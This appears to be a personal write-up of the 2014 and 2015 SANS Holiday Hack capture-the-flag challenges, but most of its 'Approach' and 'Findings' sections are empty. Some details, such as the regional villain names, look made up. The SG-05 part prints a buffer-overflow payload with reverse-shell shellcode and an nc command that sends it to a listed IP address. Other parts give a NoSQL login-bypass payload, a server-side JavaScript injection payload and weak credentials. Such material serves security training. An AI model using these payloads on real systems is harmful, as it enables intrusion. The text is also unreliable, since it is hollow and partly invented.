SANS Holiday Hack Challenge Technical Write-up (2014 & 2015)

Author: Mick Cecil
Recognition:


2015 SANS Holiday Hack Challenge – “Gnome in Your Home”

The 2015 challenge was an IoT security scenario, requiring participants to analyze an elf gnome's behavior, extract its network traffic, and exploit multiple "SuperGnome" servers.

🔹 Question 1: What commands are sent across the Gnome’s C2 channel?

Approach:

Findings:


EXEC:iwconfig EXEC:cat /tmp/iwlistscan.txt FILE:/root/Pictures/snapshot_CURRENT.jpg


🔹 Question 2: What image appears in the photo the Gnome sent?

Approach:

Findings:


🔹 Question 3: What OS and architecture does the Gnome use?

Approach:

Findings:


🔹 Question 4: What database engine is used in the Gnome?

Approach:

Findings:


🔹 Question 5: What are the IPs of the five SuperGnomes?

Approach:

Findings:

SuperGnome IP Address Location
SG-01 52.2.229.189 Ashburn, USA
SG-02 52.34.3.80 Boardman, USA
SG-03 52.64.191.71 Sydney, Australia
SG-04 52.192.152.132 Tokyo, Japan
SG-05 54.233.105.81 São Paulo, Brazil

🔹 Question 6: Exploiting the SuperGnomes

Approach:

Findings:


🔹 Question 7: How did you confirm that all SuperGnomes were compromised?

Approach:

Findings:


🔹 Question 8: What is the name of the villain behind the SuperGnome conspiracy?

Approach:

Findings:

Each SuperGnome was operated by a different regional villain, reporting to Cindy Lou Who.

SuperGnome Exploit Method Villain Name
SG-01 (Ashburn, USA) Weak credentials (admin:SittingOnAShelf) Grinchum
SG-02 (Boardman, USA) Local File Inclusion (LFI) attack Jack Skellington
SG-03 (Sydney, Australia) NoSQL Injection via MongoDB Login Bypass Krampus
SG-04 (Tokyo, Japan) Server-Side JavaScript Injection (SSJI) Oogie Boogie
SG-05 (São Paulo, Brazil) Buffer Overflow in a hidden service on port 4242 Hans Trapp

🛠 Detailed Exploit Breakdown

SG-01 (Ashburn, USA) - Weak Credentials Exploitation


SG-02 (Boardman, USA) - Local File Inclusion (LFI)


SG-03 (Sydney, Australia) - NoSQL Injection

{ "username": "admin", "password": { "$gt": "" } }

SG-04 (Tokyo, Japan) - Server-Side JavaScript Injection (SSJI)

{ "$where": "return sleep(5000) || true" }

SG-05 (São Paulo, Brazil) - Buffer Overflow

perl -e 'print "X" x (105) . "\xe4\xff\xff\xe4" . "\x90" x (4) . "\x6b\x93\x04\x08"' > vuln

perl -e 'print “\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd
\x80\x49\x79\xf9\*public ip removed*\x68\x02\x00\x22\xb8\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd
\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80”' > shell code

cat vuln shellcode | nc 54.233.105.81 4242


🕵️ Mastermind of the SuperGnome Operation


Findings:


2014 SANS Holiday Hack Challenge – “The Noble Profession”

The 2014 challenge was a story-driven penetration test of a fictitious cybersecurity firm investigating an attack on Scrooge & Marley’s financial systems.

🔹 Question 1: What secrets are hidden in the provided USB image?

Approach:

Findings:

  1. File metadata (hex dump).
  2. Embedded comments in a .pcapng network capture.
  3. A password-protected ZIP file hidden in an ADS.
  4. A steganographic message inside an image.

🔹 Question 2: What vulnerabilities exist on www.scrooge-and-marley.com?

Approach:

Findings:


🔹 Question 3: What hidden services are running on Scrooge’s network?

Approach:

Findings:

“Machines take me by surprise with great frequency. –Alan Turing”


Conclusion

Through both the 2014 and 2015 SANS Holiday Hack Challenges, I demonstrated expertise in penetration testing, digital forensics, cryptanalysis, and IoT security. By integrating creative storytelling with technical depth, I was able to identify and exploit vulnerabilities effectively while maintaining an engaging approach to cybersecurity problem-solving.